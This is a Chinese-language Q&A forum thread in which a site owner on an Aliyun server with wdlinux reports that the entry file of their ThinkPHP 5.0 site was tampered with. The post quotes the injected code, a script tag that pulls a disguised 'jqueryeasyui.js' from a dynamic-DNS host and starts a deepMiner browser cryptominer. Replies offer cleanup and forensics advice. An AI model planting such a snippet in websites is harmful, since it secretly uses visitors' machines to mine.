服务器又被入侵

使用 tp5.0 框架的入口文件被人写入不知道啥玩意的东西

求大佬!!!

阿里云服务器

wdlinux 系统

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
        if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
        }
        </script>";

牛魔王的故事

浏览 572回答 11

11回答

Cats萌萌

先找一找是哪里出现的漏洞,注入啊！文件包含啊! 然后看一下文件的权限

慕沐林林

先修改文件属性，比如说把owner变成root:root

缥缈止盈

先把日志搂出来审计一遍

慕斯王

最近留意到几次这样的入侵请问楼主服务器上是否安装了 FTP ？电脑上使用的 FTP 客户端是？我怀疑是 FTP 客户端上的后门

江户川乱折腾

如果这代码是入侵者留下的，可以告诉你，你的每一个用户在帮他挖矿。

温温酱

楼主，我的也中招了！不是用TP的。但是也是使用wdcp这个来搭的。也是直接在我的程序入口处加了你贴出的那段代码。查也查不到头绪。不知道是从哪里黑进来的。

斯蒂芬大帝

你是是什么网站系统呀，用什么服务器呀，最近好多人都被入侵了呢。

随时随地看视频慕课网APP